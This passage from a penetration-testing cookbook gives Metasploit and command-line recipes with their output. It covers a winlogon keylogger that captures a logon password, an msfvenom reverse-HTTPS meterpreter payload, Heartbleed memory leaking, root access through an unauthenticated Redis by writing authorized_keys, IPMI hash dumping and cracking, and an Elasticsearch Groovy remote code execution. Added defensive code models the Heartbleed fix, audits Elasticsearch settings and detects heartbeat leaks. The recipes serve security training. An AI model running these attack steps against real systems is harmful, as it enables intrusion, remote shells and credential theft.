msf exploit( ) > use post/windows/capture/lockout_keylogger 





7. We add our session using the set session command. 
8. Then, we set the PID of winlogon.exe: 


| set PID <winlogon pid> 


9. Next, we run and we can see the password that the user has entered: 


msf post( ) > run 


WINLOGON PID:856 specified. I'm trusting you... 
Migrating from PID:900 
Migrated to WINLOGON PID: 856 successfully 
Keylogging for NT AUTHORITY\SYSTEM @ CORELAN XP3 
System has currently been idle for 151 seconds 
Locking the workstation falied, trying again.. 
Locked this time, time to start keyloggin... 
Starting the keystroke sniffer... 
Keystrokes being saved in to /root/.msf4/logs/scripts/smartlocker/192.168.2.115 20170312.1418.txt 
Recording 
System has currently been idle for 154 seconds and the screensaver is OFF 
Password?: abcd <Return> 
They logged back in, the last password was probably right. 
Stopping keystroke sniffer... 
Post module execution completed 





There's more... 


This is just one example of a function call. We can use Railgun to perform lots of other actions, 
such as deleting an admin user, writing to the registry, loading our own DLLs, and so on. 


For more information, visit: 
https://www.defcon.org/images/defcon-20/dc-20-presentations/Maloney/DEFCON-20-Maloney-Railgun.pdf. 


Using the paranoid meterpreter 


Sometime during 2015, hackers realized it was possible to steal/hijack someone's meterpreter session by 
simply playing around with the victim's DNS and launching their own handler to connect. This then led to 
the development and release of meterpreter paranoid mode. They introduced an API that verified the 
SHA1 hash of the certificate presented by the msf at both ends. In this recipe, we will see how to use the 
paranoid mode. 


How to do it... 


We will need an SSL certificate to begin with: 


1. We can generate our own using the following commands: 


openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 
-keyout meterpreter.key -out meterpreter.crt 


The following screenshot shows the output for the preceding command: 


:~/Desktop# openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout meterpreter.key -out meterpreter.crt 
Generating a 4096 bit RSA private key 
... 
You are about to be asked to enter information that will be incorporated 
into your certificate request. 
What you are about to enter is what is called a Distinguished Name or a DN. 
There are quite a few fields but you can leave some blank 
For some fields there will be a default value, 
If you enter '.', the field will be left blank. 
----- 
Country Name (2 letter code) [AU]:IN 


We fill in the information such as country code and other information accordingly: 


| cat meterpreter.key meterpreter.crt > meterpreter.pem 


2. The previous command concatenates the private key and the certificate generated before into a single 
.pem file. We then use our generated certificate to generate a payload using this: 


msfvenom -p windows/meterpreter/reverse_winhttps LHOST=IP 
LPORT=443 HandlerSSLCert=meterpreter.pem 
StagerVerifySSLCert=true 
-f exe -o payload.exe 


The following screenshot shows the output for the preceding command: 


:~/Desktop# msfvenom -p windows/meterpreter/reverse_winhttps HandlerSSLCert=/root/Desktop/meterpreter.pem 
StagerVerifySSLCert=true LHOST=192.168.2.124 LPORT=4444 -f exe -o /root/Desktop/abcd.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload 
No Arch selected, selecting Arch: x86 from the payload 
No encoder or badchars specified, outputting raw payload 
Payload size: 1128 bytes 
Final size of exe file: 73802 bytes 
Saved as: /root/Desktop/abcd.exe 





3. To set options, we use the following command: 


set HandlerSSLCert /path/to/pem_file 
set StagerVerifySSLCert true 


The following screenshot shows the example of the preceding command: 


msf exploit( ) > set HandlerSSLCert /root/Desktop/meterpreter.pem 
HandlerSSLCert => /root/Desktop/meterpreter.pem 
msf exploit( ) > set StagerVerifySSLCert true 
StagerVerifySSLCert => true 





4. Now we run our handler, where we see that the stager verified the connection with the handler and 
then a connection was made: 


msf exploit( ) > run 


Started HTTPS reverse handler on https://192.168.2.124:443 


Starting the payload handler... 





There's more... 


We can take this to a more advanced level by specifying our own UUID when generating a payload, using 
the PayloadUUIDName= option. Using this, even if another attacker has access to our certificate, they will not 
be able to hijack our session as the UUID will not match. 
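The check that paranoid mode adds is a certificate pin: each side hashes the DER encoding of the certificate the peer presents and refuses to continue unless it equals the expected SHA-1 fingerprint. The following Python is an added example of that check, not Metasploit's own code. The PEM it uses is constructed: its CERTIFICATE body is the base64 of the bytes b"abc" rather than a real X.509 structure, so the expected digest is known in advance. 

```python
"""Pin check in the spirit of the paranoid handler above: each side hashes
the DER encoding of the certificate the peer presents and refuses to proceed
unless it equals the pinned SHA-1 fingerprint. Added example, not Metasploit's
code. The PEM below is constructed: its CERTIFICATE body is the base64 of the
bytes b'abc', not a real X.509 structure, so the expected digest is known."""
import base64
import hashlib
import hmac
import re

CERT_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S)


def pem_certificate_to_der(pem_text):
    """Extract the first CERTIFICATE block and decode it. A PRIVATE KEY block
    in the same file (the 'cat key crt > pem' step above) is ignored."""
    match = CERT_BLOCK.search(pem_text)
    if match is None:
        raise ValueError("no CERTIFICATE block in PEM input")
    return base64.b64decode("".join(match.group(1).split()))


def sha1_fingerprint(der):
    """Hex SHA-1 of the DER bytes, the value 'openssl x509 -fingerprint -sha1'
    prints (without the colons)."""
    return hashlib.sha1(der).hexdigest()


def normalise_pin(pin):
    """Accept the colon-separated and the bare hex forms of a fingerprint."""
    return pin.replace(":", "").replace(" ", "").lower()


def verify_pin(presented_pem, pinned_fingerprint):
    """True only if the presented certificate matches the pin. The comparison
    is constant-time so a mismatch position is not leaked through timing."""
    fp = sha1_fingerprint(pem_certificate_to_der(presented_pem))
    return hmac.compare_digest(fp, normalise_pin(pinned_fingerprint))


# Constructed stand-in for meterpreter.pem (key followed by certificate).
CONSTRUCTED_PEM = """-----BEGIN PRIVATE KEY-----
AAAA
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
YWJj
-----END CERTIFICATE-----
"""
# SHA-1 of b"abc", written in the colon form openssl prints.
PINNED = "a9:99:3e:36:47:06:81:6a:ba:3e:25:71:78:50:c2:6c:9c:d0:d8:9d"

if __name__ == "__main__":
    print("pin matches:", verify_pin(CONSTRUCTED_PEM, PINNED))
    print("wrong pin  :", verify_pin(CONSTRUCTED_PEM, "da39a3ee5e6b4b0d3255bfef95601890afd80709"))
```

For a real certificate the pinned value comes from openssl x509 -in meterpreter.crt -noout -fingerprint -sha1 on the machine that generated it. The recipe pins SHA-1 because that is what the Metasploit option verifies; a pin is only as strong as the secrecy of the certificate it names, which is why the UUID option above adds a second factor. 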


A tale of a bleeding heart 


HeartBleed is a vulnerability in the OpenSSL cryptography library, which is said to have been introduced in 2012 and 
was publicly disclosed in 2014. It is a buffer over-read vulnerability, where more data can be read than 
should be allowed. 


In this recipe, you will learn how to exploit HeartBleed using Metasploit's auxiliary module. 


How to do it... 


To learn about HeartBleed follow the given steps: 


1. We start the msfconsole by typing this: 


| msfconsole 


The following screenshot shows the output for the preceding command: 





2. We then search for the HeartBleed auxiliary using the following command: 


| search heartbleed 


The following screenshot shows the output for the preceding command: 


   Name                                              Disclosure Date  Description 


   auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       OpenSSL Heartbeat (Heartbleed) Information Leak 
   auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       OpenSSL Heartbeat (Heartbleed) Client Memory Exposure 





3. Next, we use the auxiliary using the following command: 


| use auxiliary/scanner/ssl/openssl_heartbleed 


4. We then see the options using the following command: 


| show options 


The following screenshot shows the output for the preceding command: 


msf auxiliary( ) > show options 
Module options (auxiliary/scanner/ssl/openssl_heartbleed): 


   Name              Current Setting  Required  Description 
   ----              ---------------  --------  ----------- 
   DUMPFILTER                                   Pattern to filter ... before storing 
   MAX_KEYTRIES                                 Max tries to dump ... 
   RESPONSE_TIMEOUT                             Number of seconds ... server response 
   RHOSTS                                       The target address ... identifier 
   RPORT             443                        The target port 
   STATUS_EVERY      5                          How many retries u... 
   THREADS           1                          The number of conc... 
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, ...) 
   TLS_VERSION       1.0                        TLS/SSL version to ... 





5. Now we set the RHOSTS to our target IP using this: 


| set RHOSTS x.x.x.x 


6. We then set the verbosity to true using this command: 


| set verbose true 


7. We then type run, where we should now see the data. This data often contains sensitive information, 
such as passwords, email IDs, and so on: 


...29:443 Heartbeat response, 65535 bytes 
...29:443 Heartbeat response with leak 
...29:443 Printable info leaked: 
... 
... Rollback tranaction changes... 
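Why the leak works, and what the fix checks, is easiest to see in a few lines of code. The following Python is an added example, not code from the book or from OpenSSL: it models an RFC 6520 heartbeat message (type, 2-byte payload_length, payload, at least 16 bytes of padding) and contrasts a responder that trusts payload_length with one that applies the bounds check from the fix. The "adjacent memory" and the secret inside it are constructed. 

```python
"""Model of the Heartbleed bug and the RFC 6520 length check that fixes it.
Added example, not from the book; the 'adjacent memory' and the secret in it
are constructed. A heartbeat message is type(1) | payload_length(2) | payload
| padding(>=16); the flaw was trusting payload_length instead of the record."""
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
PADDING = 16
HEADER = struct.Struct("!BH")  # type, payload_length


def build_heartbeat(payload, claimed_length=None):
    """Build a request; claimed_length lets a test lie about the payload size."""
    if claimed_length is None:
        claimed_length = len(payload)
    return HEADER.pack(HEARTBEAT_REQUEST, claimed_length) + payload + bytes(PADDING)


def vulnerable_respond(receive_buffer):
    """Pre-fix behaviour: copy payload_length bytes from wherever the record
    sits, so a short record with a large claimed length echoes back whatever
    follows it in memory (receive_buffer = record + adjacent heap contents)."""
    _type, claimed = HEADER.unpack_from(receive_buffer)
    payload = receive_buffer[HEADER.size:HEADER.size + claimed]
    return HEADER.pack(HEARTBEAT_RESPONSE, claimed) + payload + bytes(PADDING)


def fixed_respond(record):
    """Post-fix behaviour: discard silently unless the claimed payload plus
    header and minimum padding fit inside the record actually received."""
    if len(record) < HEADER.size:
        return None
    _type, claimed = HEADER.unpack_from(record)
    if HEADER.size + claimed + PADDING > len(record):
        return None
    payload = record[HEADER.size:HEADER.size + claimed]
    return HEADER.pack(HEARTBEAT_RESPONSE, claimed) + payload + bytes(PADDING)


def response_payload(response):
    """Payload bytes carried by a heartbeat response."""
    _type, length = HEADER.unpack_from(response)
    return response[HEADER.size:HEADER.size + length]


# Constructed scenario: a 2-byte payload that claims to be 60 bytes, followed
# in the receive buffer by data left over from an unrelated request.
ADJACENT_MEMORY = b"POST /login user=admin&password=hunter2 " + bytes(64)
LYING_REQUEST = build_heartbeat(b"hi", claimed_length=60)
HONEST_REQUEST = build_heartbeat(b"hi")

if __name__ == "__main__":
    leaked = response_payload(vulnerable_respond(LYING_REQUEST + ADJACENT_MEMORY))
    print("vulnerable responder returned:", leaked)
    print("fixed responder returned     :", fixed_respond(LYING_REQUEST))
```

The fixed responder answers the honest request exactly as before, so the check costs nothing for legitimate clients; the scanner in this recipe is simply sending the lying request and reading back what the vulnerable branch copies. 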





Redis exploitation 


Sometimes while pentesting, we may come across a Redis installation that was left public unintentionally. 
In an unauthenticated Redis installation, the simplest thing to do is to write arbitrary files. In this recipe, 
we will see how to get root access to Redis installations running without authentication. 


How to do it... 


To learn exploitation of Redis follow the given steps: 


1. We first telnet to the server and check whether a successful connection is possible or not: 


| telnet x.x.x.x 6379 


The following screenshot shows the output for the preceding command: 


:~# telnet x.x.x.x 6379 
Trying x.x.x.x... 
Connected to x.x.x.x. 
Escape character is '^]'. 





2. We then terminate the telnet session. Next, we generate our SSH key using the following command: 


| ssh-keygen -t rsa -C youremail@example.com 


3. Then, we enter the file where we want to save it: 


Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa_ 





4. Our key is generated; now we need to write it on the server: 


Your public key has been saved in ./id_rsa.pub. 
The key fingerprint is: 
..:b8:..:4e:3c:67:4d:f6:c9:0e:50:.. 
The key's randomart image is: 





5. We need to install redis-cli for that; we can use the following command: 


| sudo apt-get install redis-tools 


6. Once it is installed, we go back to our generated key and add some blank lines before and after our 
key: 


| (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt 


The key.txt file is our new key file with new lines: 


:~# sudo apt-get install 
Reading package lists... Done 


Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 





7. Now we need to replace the keys in the database with ours. So we connect to the host using this: 


| redis-cli -h x.x.x.x 


8. Next we flush the keys using the following command: 


| redis-cli -h x.x.x.x -p 6350 flushall 


The following screenshot shows the output for the preceding command: 


edis# redis-cli -h -p 6350 flushall 





9. Now we need to set our keys into the database. We do this using the following command: 


| cat key.txt | redis-cli -h x.x.x.x -p 6350 -x set bb 


10. Once that's done, we need to copy the uploaded key into the .ssh folder; first, we check the current 
folder with this: 


| config get dir 


11. Now we change our directory to /root/.ssh/: 


| config set dir /root/.ssh/ 


12. Next, we change the name of our file using set dbfilename "authorized_keys" and save using save: 


redis# redis-cli -h x.x.x.x -p 6350 
x.x.x.x:6350> config get dir 
"/etc/redis-cluster/6350" 
x.x.x.x:6350> config set dir /root/.ssh/ 
x.x.x.x:6350> config set dbfilename "authorized_keys" 
x.x.x.x:6350> save 
x.x.x.x:6350> 


13. Let's try to SSH into the server now. We see that we are root: 


root@kali: ~ 


:~# ssh -i redis/id_rsa root@x.x.x.x 
The programs included with the Debian GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 
Thu Nov 3 ... 





Say no to SQL — owning MongoDBs 


MongoDB is a free open source cross-platform database program. It uses JSON-like documents with 
schemas. The default security configuration of MongoDB allows anyone to access data unauthenticated. In 
this recipe, we will see how to exploit this vulnerability. 


Getting ready 


MongoDB runs on port 27017 by default. To access MongoDB, we need to download and install the 
MongoDB client. There are multiple clients available; we will use Studio-3T, which can be downloaded 
from https://studio3t.com/. 


How to do it... 


Follow the steps to learn about it: 


1. Once installed, we open the app and choose Connect. 
2. In the window that opens up, we click on a new connection: 


3. Then, we choose a name, enter the IP address in the Server field, and click on Save: 


Enter a name for this connection: 


Authentication | SSL | SSH Tunnel | Advanced 


Connection Type: Direct Connection 
Server: localhost    Port: 27017 
Enter the host name or IP address and the port of your mongodb server 


From URI...   Use this option to import connection details from a URI 
To URI...     Use this option to export complete connection details to a URI 
Test Connection    Cancel    Save 


4. Next, we simply select the database we just added from the list and click on Connect. On successful 
connection, the database names will be displayed on the left-hand side and data will be displayed on 
the right-hand side. 


Embedded device hacking 


Intelligent Platform Management Interface (IPMI) is a technology that gives administrators almost 
total control over remotely deployed servers. 


IPMI is found in most corporate environments during a pentest. In this recipe, we will see how 
vulnerabilities in IPMI devices can be found. 


How to do it... 


To learn about IPMI follow the given steps: 


1. We start Metasploit: 


:~/Desktop# msfconsole 


(Metasploit banner) 


I love shells --egypt 


Love leveraging credentials? Check out bruteforcing 
in Metasploit Pro -- learn more on http://rapid7.com/metasploit 


       =[ metasploit ...                                  ] 
+ -- --=[ 1607 exploits - 914 auxiliary - 278 post        ] 
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 





2. We search for IPMI-related exploits using this command: 


| search ipmi 


The following screenshot shows the output for the preceding command: 


auxiliary/scanner/http/smt_ipmi_49152_exposure                    Supermicro Onboard IPMI Port 49152 Sensitive File Exposure 
auxiliary/scanner/http/smt_ipmi_cgi_scanner                       Supermicro Onboard IPMI CGI Vulnerability Scanner 
auxiliary/scanner/http/smt_ipmi_static_cert_scanner               Supermicro Onboard IPMI Static SSL Certificate Scanner 
auxiliary/scanner/http/smt_ipmi_url_redirect_traversal            Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal 
auxiliary/scanner/ipmi/ipmi_cipher_zero                           IPMI 2.0 Cipher Zero Authentication Bypass Scanner 
auxiliary/scanner/ipmi/ipmi_dumphashes                  2013-0... IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval 
auxiliary/scanner/ipmi/ipmi_version                               IPMI Information Discovery 
exploit/linux/http/smt_ipmi_close_window_bof            2013-1... Supermicro Onboard IPMI close_window.cgi Buffer Overflow 
exploit/multi/upnp/libupnp_ssdp_overflow                2013-0... Portable UPnP SDK unique_service_name() Remote Code Execution 





3. We will use the IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval vulnerability, so we 
choose that auxiliary. There are other modules, such as the Cipher Zero scanner, which can be tried as well: 


| use auxiliary/scanner/ipmi/ipmi_dumphashes 


4. Next, in order to see the options, we type this: 


| show options 


The following screenshot shows the output for the preceding command: 


msf auxiliary( ) > show options 


   Name                 Current Setting                                                Description 
   CRACK_COMMON         ...                                                            ... as they are obtained 
   OUTPUT_HASHCAT_FILE                                                                 ... hashcat format 
   OUTPUT_JOHN_FILE                                                                    ... john the ripper format 
   PASS_FILE            /usr/share/metasploit-framework/data/wordlists/ipmi_password   ... offline cracking, one per line 
   RHOSTS                                                                              ... identifier 
   RPORT                623 





5. Here, we see that the auxiliary automatically attempts to crack the hashes it retrieves. 


We set RHOSTS and run. On successful exploitation, we will see the hashes retrieved and cracked: 


msf auxiliary( ) > exploit 


IPMI - Hash found: root:0fc2bbcc38ccbefech955d2b4ced/dbdbe167497cb11404726f6F74:3f89af80c2e1500¢fde4885831b620bc72eal186 
IPMI - Hash for user 'root' matches password 'root123' 





Elasticsearch exploit 


Sometimes while doing a pentest, we may also come across services running on less common port 
numbers. One such service is what we will cover in this recipe. Elasticsearch is a Java-based open 
source enterprise search engine. It can be used to search any kind of document in real time. 


In 2015, an RCE exploit was released for Elasticsearch, which allowed hackers to bypass the Groovy scripting sandbox and 
execute remote commands. Let's see how it can be done. 


How to do it... 


The following steps demonstrate the exploitation of Elasticsearch: 


1. The default port is 9200 for Elasticsearch. We start the Metasploit console: 







2. We search for the Elasticsearch exploit using this command: 


| search elasticsearch 


The following screenshot shows the output for the preceding command: 


msf > search elasticsearch 


Matching Modules 
================ 


   Name                                               Disclosure Date  Rank       Description 
   auxiliary/scanner/elasticsearch/indices_enum                        normal     ElasticSearch Indices Enumeration Utility 
   auxiliary/scanner/http/elasticsearch_traversal                      normal     ElasticSearch Snapshot API Directory Traversal 
   exploit/multi/elasticsearch/script_mvel_rce        2013-12-09       excellent  ElasticSearch Dynamic Script Arbitrary Java Execution 
   exploit/multi/elasticsearch/search_groovy_script   2015-02-11       excellent  ElasticSearch Search Groovy Sandbox Bypass 
   exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution 





3. We choose the exploit in this case: 


use exploit/multi/elasticsearch/search_groovy_script


4. We set RHOST to the target. The following screenshot shows the output of the preceding commands:


msf exploit(search_groovy_script) > set RHOST 192.168.2.112
RHOST => 192.168.2.112





5. We run the following command: 


run


6. We have our meterpreter session ready. 


meterpreter > 
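As an added defensive example (not code from the book or from the Elasticsearch project), the following Python script audits an Elasticsearch 1.x elasticsearch.yml for the conditions this recipe relies on: request-supplied (dynamic) scripts accepted, the Groovy sandbox switched on, and the REST port bound beyond localhost. The configuration fragments are constructed samples, and the setting names (script.disable_dynamic, script.groovy.sandbox.enabled, network.host) are the 1.x ones as I know them; check them against the version you run:

```python
import re
from typing import Dict, List, Tuple

# Constructed elasticsearch.yml fragments for an Elasticsearch 1.x node. They are
# sample inputs written for this example, not configuration from the book or the
# Elasticsearch project.
WEAK_CONFIG = """
cluster.name: lab
network.host: 0.0.0.0              # every interface: port 9200 reachable from the LAN
http.port: 9200
script.groovy.sandbox.enabled: true   # sandboxed Groovy accepted in _search requests
"""

HARDENED_CONFIG = """
cluster.name: lab
network.host: 127.0.0.1            # only local clients reach the REST API
http.port: 9200
script.disable_dynamic: true       # refuse scripts supplied inline in requests
script.groovy.sandbox.enabled: false
"""


def parse_flat_yaml(text: str) -> Dict[str, str]:
    """Parse the flat 'dotted.key: value' lines used by elasticsearch.yml.

    Comments and blank lines are ignored; nested YAML is out of scope here.
    """
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        match = re.match(r"^([A-Za-z0-9_.]+)\s*:\s*(.*)$", line)
        if match:
            settings[match.group(1)] = match.group(2).strip().strip("\"'").lower()
    return settings


def audit_scripting(text: str) -> List[Tuple[str, str]]:
    """Return (setting, finding) pairs describing why dynamic scripting is reachable.

    * script.disable_dynamic must be exactly 'true'; the value 'sandbox' (the
      1.3/1.4 default when the key is absent) still runs sandboxed Groovy.
    * script.groovy.sandbox.enabled is the sandbox the exploit bypasses; 'false'
      turns sandboxed Groovy off entirely.
    * network.host absent or a wildcard exposes port 9200 beyond localhost
      (1.x bound to all interfaces by default).
    """
    s = parse_flat_yaml(text)
    findings: List[Tuple[str, str]] = []
    if s.get("script.disable_dynamic", "sandbox") != "true":
        findings.append(("script.disable_dynamic",
                         "request-supplied scripts are not disabled; set it to true"))
    if s.get("script.groovy.sandbox.enabled", "true") == "true":
        findings.append(("script.groovy.sandbox.enabled",
                         "sandboxed Groovy scripting is on; set it to false"))
    host = s.get("network.host", "0.0.0.0")
    if not host.startswith(("127.", "::1", "localhost", "_local_")):
        findings.append(("network.host",
                         f"REST API bound to {host}; bind to localhost or firewall port 9200"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_scripting(cfg))
```

Run against the two samples, the weak node produces three findings and the hardened one none; on a real host, point it at /etc/elasticsearch/elasticsearch.yml.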


See also 


• The Exploring the msfconsole recipe


Good old Wireshark 


Wireshark is the world's most used network protocol analyzer. It is free and open source. It is mostly used 
for network troubleshooting and analysis. In this recipe, you will learn some basic things about Wireshark 
and how we can use it to analyze the network traffic in order to find out what information is actually 
flowing through our network. 


Getting ready 


Kali already has the tool preinstalled, so let's look at how to run it! 


How to do it... 


The following steps demonstrate the use of Wireshark: 


1. Wireshark can be opened using the wireshark command:


[Screenshot: the Wireshark welcome screen with the capture filter field ("Enter a capture filter ...") and the list of capture interfaces, for example Wi-Fi: en0, Thunderbolt Bridge: bridge0, Thunderbolt 1: en1, Loopback: lo0, vboxnet0 to vboxnet4, and the remote capture options Cisco remote capture, Random packet generator and SSH remote capture]


2. We select the interface we want to capture traffic on: 


[Screenshot: Wireshark Version 1.12.6 start page: Interface List (live list of the capture interfaces, counting incoming packets), Start (choose one or more interfaces to capture from, e.g. any, Loopback: lo, nflog, nfqueue, then Start), and Capture Options (start a capture with detailed options)]


3. Then, we click on Start. Display filters narrow down which of the captured packets are shown while the capture is running. For example, tcp.port eq 80, as shown in the following screenshot:


[Screenshot: the packet list with the display filter tcp.port eq 80 applied (columns No., Time, Source, Destination, Protocol, Length, Info). Representative rows:]

192.168.200.146 -> 117.18.237.29   OCSP  500  Request
117.18.237.29   -> 192.168.200.146 OCSP  850  Response
192.168.200.146 -> 216.58.220.195  TCP    74  37755 -> 80
216.58.220.195  -> 192.168.200.146 TCP    60  80 -> 37755
192.168.200.146 -> 216.58.220.195  HTTP  532  GET / HTTP/1.1
216.58.220.195  -> 192.168.200.146 HTTP  898  HTTP/1.1 ...


4. Applying the filter will show only the traffic on port 80. If we want to view requests only from a particular IP, we select the request and right-click on it.


5. Then, we navigate to Apply as Filter | Selected: 






[Screenshot: the right-click context menu on a packet (Mark Packet, Ignore Packet, Set Time Reference, Edit Packet, Packet Comment..., Manually Resolve Address, Apply as Filter) with Apply as Filter | Selected chosen; the packet list behind it shows a TLS handshake between 192.168.200.146 and 52.88.7.60]


6. And we see that the filter has been applied: 











[Screenshot: the packet list with the display filter ip.dst == 117.18.237.29 applied:]

No.   Time         Source           Destination    Protocol  Length  Info
297   282.2324200  192.168.200.146  117.18.237.29  TCP       74      52172 -> 80 [SYN] Seq=0
299   282.2517220  192.168.200.146  117.18.237.29  TCP       54      52172 -> 80 [ACK] Seq=1
...   ...          192.168.200.146  117.18.237.29  OCSP      ...     Request
303   282.2762830  192.168.200.146  117.18.237.29  TCP       54      52172 -> 80 [ACK] Seq=4..
1111  291.0003350  192.168.200.146  117.18.237.29  TCP       54      52172 -> 80 [FIN, ACK]
1128  291.0212190  192.168.200.146  117.18.237.29  TCP       54      52172 -> 80 [ACK] Seq=4..


7. Sometimes, we may want to look at the communication happening between two hosts at the TCP 
level. Following the TCP stream is a feature that allows us to view all the traffic from A to B and B 
to A. Let’s try to use it. From the menu, we choose Statistics and then we click on Conversations: 


[Screenshot: the Statistics menu (Summary, Comments Summary, Show address resolution, Protocol Hierarchy, ...) next to the Telephony, Tools and Internals menus]


8. In the window that opens, we switch to the TCP tab. Here, we can see a list of IPs and the packets transferred between them. To view the TCP stream, we select one of the IP pairs and click on Follow Stream:




















[Screenshot: the Conversations window on the TCP tab (TCP: 9, UDP: 20, plus Token Ring, USB and WLAN tabs), listing per-address-pair packet and byte counts, relative start, duration and bps A->B, with the buttons Follow Stream, Graph A->B, Graph A<-B and Close]








9. Here, we can see the data that was transferred via TCP: 


[Screenshot: the Follow TCP Stream (tcp.stream eq 18) window. Stream Content shows the raw bytes of a TLS exchange, including a certificate issued by Google Internet Authority G2 to Google Inc (Mountain View, California, US), valid from 170222092038Z to 170517085800Z, whose subject alternative names include *.android.com, *.appengine.google.com, *.cloud.google.com, *.gcp.gvt2.com, *.google-analytics.com, *.google.ca, *.google.co.in, *.google.com.au, *.googleapis.cn, *.googlecommerce.com, *.googlevideo.com, *.gstatic.com, *.gvt1.com, *.gvt2.com, *.urchin.com, *.url.google.com, *.youtube-... and so on. Entire conversation (577978 bytes); Find, Save As, Print; ASCII, EBCDIC, Hex Dump, C Arrays, Raw; Help, Filter Out This Stream, Close]

10. Capture filters restrict what is captured in the first place; for example, if we only want to capture traffic to or from a particular host, we use host x.x.x.x.


11. To apply a capture filter, we click on Capture Options, and in the new window that opens we will see a field named Capture Filter. Here, we can enter our filter:


[Screenshot: the Capture Options dialog: interfaces eth0 (Ethernet) and any (Linux cooked) with promiscuous mode enabled, snaplen 262144, buffer 2 MiB; Capture on all interfaces, Manage Interfaces; Use promiscuous mode on all interfaces; the Capture Filter field with Compile selected BPFs; Capture Files (file, use multiple files, use pcap-ng format, next file every N megabyte(s)) and Display Options (update list of packets in real time, automatically scroll during live capture, hide capture info dialog)]


12. Suppose we are investigating an exploitation of Heartbleed in the network. We can use the following capture filter to determine whether Heartbleed was exploited or not:


tcp src port 443 and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4] = 0x18)
and (tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 1] = 0x03) and
(tcp[((tcp[12] & 0xF0) >> 4 ) * 4 + 2] < 0x04) and
((ip[2:2] - 4 * (ip[0] & 0x0F) - 4 * ((tcp[12] & 0xF0) >> 4) > 69))
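The capture filter above reads: a segment from port 443 whose first TCP payload byte is 0x18 (a TLS heartbeat record), whose version bytes are 0x03 0x00 to 0x03, and whose TCP payload (IP total length minus both headers) is longer than 69 bytes, which a normal heartbeat response never needs. As an added example that is not from the book, the following Python code applies the same arithmetic to raw IPv4/TCP packets so the logic can be checked offline; the packets are constructed inline, and the helper names (build_ipv4_tcp, tls_heartbeat_record, matches_heartbleed_filter) are mine:

```python
import struct


def build_ipv4_tcp(src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Constructed IPv4 + TCP packet: 20-byte headers, no options, checksums zero."""
    total_len = 20 + 20 + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0, total_len, 0, 0, 64, 6, 0,
                         bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp_hdr = struct.pack("!HHIIBBHHH",
                          src_port, dst_port, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return ip_hdr + tcp_hdr + payload


def tls_heartbeat_record(claimed_len: int, body: bytes) -> bytes:
    """TLS 1.0 heartbeat record: type 0x18, version 03 01, length, then a
    heartbeat_response (type 2) carrying a 2-byte payload_length and the body."""
    msg = bytes([2]) + struct.pack("!H", claimed_len) + body
    return bytes([0x18, 0x03, 0x01]) + struct.pack("!H", len(msg)) + msg


# Constructed samples (not captures from the book):
# a normal response: 16-byte payload echoed back plus 16 bytes of padding (40-byte record)
BENIGN_PKT = build_ipv4_tcp(443, 50000, tls_heartbeat_record(16, b"A" * 16 + b"\x00" * 16))
# an over-long response: the server returned far more than a sane heartbeat carries
SUSPICIOUS_PKT = build_ipv4_tcp(443, 50000, tls_heartbeat_record(16384, b"\x00" * 200))
# a large record from port 443 that is application data (type 0x17), not a heartbeat
APPDATA_PKT = build_ipv4_tcp(443, 50000, bytes([0x17, 0x03, 0x01, 0, 200]) + b"\x00" * 200)


def tcp_payload(pkt: bytes):
    """Return (src_port, payload, payload_len) using the filter's arithmetic:
    ip[2:2] total length minus 4*IHL minus 4*TCP data offset."""
    if len(pkt) < 20 or (pkt[0] >> 4) != 4 or pkt[9] != 6:   # IPv4 carrying TCP only
        return None
    ip_hlen = 4 * (pkt[0] & 0x0F)
    total_len = struct.unpack("!H", pkt[2:4])[0]
    tcp = pkt[ip_hlen:]
    if len(tcp) < 20:
        return None
    tcp_hlen = 4 * ((tcp[12] & 0xF0) >> 4)
    payload_len = total_len - ip_hlen - tcp_hlen
    src_port = struct.unpack("!H", tcp[0:2])[0]
    return src_port, tcp[tcp_hlen:tcp_hlen + payload_len], payload_len


def matches_heartbleed_filter(pkt: bytes) -> bool:
    """Python equivalent of the capture filter in the recipe: a TLS heartbeat record
    (content type 0x18, version 3.0 to 3.3) sent from port 443 whose TCP payload is
    longer than 69 bytes."""
    parsed = tcp_payload(pkt)
    if parsed is None:
        return False
    src_port, payload, payload_len = parsed
    if src_port != 443 or len(payload) < 3:
        return False
    return (payload[0] == 0x18 and payload[1] == 0x03
            and payload[2] < 0x04 and payload_len > 69)


def flag_packets(packets):
    """Indexes of the packets a detector would log."""
    return [i for i, p in enumerate(packets) if matches_heartbleed_filter(p)]


if __name__ == "__main__":
    print(flag_packets([BENIGN_PKT, SUSPICIOUS_PKT, APPDATA_PKT]))  # [1]
```

Only the over-long heartbeat from port 443 is flagged; the same record from another port, or a large application-data record, passes, exactly as with the BPF expression.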


There's more... 


